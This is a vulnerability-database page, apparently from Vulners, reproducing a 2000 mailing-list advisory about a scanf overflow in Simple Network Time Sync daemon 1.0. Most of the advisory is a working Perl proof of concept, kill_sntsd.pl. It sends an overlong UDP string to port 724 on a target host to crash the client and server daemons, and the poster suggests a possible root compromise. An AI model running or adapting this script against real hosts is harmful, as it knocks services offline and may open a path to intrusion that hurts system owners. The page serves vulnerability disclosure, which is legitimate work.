Lucene search
kill_sntsd.pl
Uncommon scanf overflow in Simple Network Time Sync daemon 1.0 may lead to root compromise.
Show more
`I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon
and client version 1.0, tested on Redhat 6.1. I haven't looked into this
fully yet, but it looks as tho it could be root comprimising as it sits on a
priveledged udp port and seems to coredump, but looks like it only gives you
50 chars to run code with. I have included some perl here which will crash
it remotely by sending it a string over 50 chars.
---------------------------------------
#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#
use Socket;
send_packet(); # Needs to send 2 packets to kill the client and the server
daemons
send_packet();
sub send_packet {
$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);
$|=1;
connect(SH, $sin) || die "$!\n";
# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);
}
---------------------------------------
logistix
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo01 Jun 2000 00:00Current
7.4High risk
Vulners AI Score7.4